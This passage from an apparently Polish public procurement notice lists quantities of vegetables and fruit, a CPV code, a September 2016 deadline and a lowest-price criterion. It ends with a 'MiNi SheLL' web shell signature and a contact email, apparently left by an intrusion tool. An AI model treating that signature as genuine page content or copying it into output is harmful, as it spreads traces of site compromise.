kg
16.
Jaja
1200
kg
17.
Kalafior
500
szt
18.
Kapusta biała
400
kg
19.
Kapusta czerwona
60
kg
20.
Kapusta kiszona
300
kg
21.
Kapusta młoda
400
szt
22.
Kapusta pekińska
120
kg
23.
Kapusta włoska
35
szt
24.
Koper
1000
pęczek
25.
Mandarynki
3000
kg
26.
Marchew
1500
kg
27.
Natka pietruszki
650
pęczek
28.
Nektarynki
3000
kg
29.
Ogórek kiszony
200
kg
30.
Ogórek małosolny
600
kg
31.
Ogórek szklarniowy
1500
kg
32.
Papryka czerwona
150
kg
33.
Pieczarka
200
kg
34.
Pietruszka
150
kg
35.
Pomidor malinowy
1200
kg
36.
Pomidor
1000
kg
37.
Pomarańcze
500
kg
38.
Por
200
kg
39.
Rzodkiewka
500
pęczek
40.
Sałata masłowa
600
szt
41.
Seler
150
kg
42.
Szczypior
900
pęczek
43.
Śliwka fioletowa
350
kg
44.
Wiśnie
300
kg
45.
Ziemniak młody
18000
kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com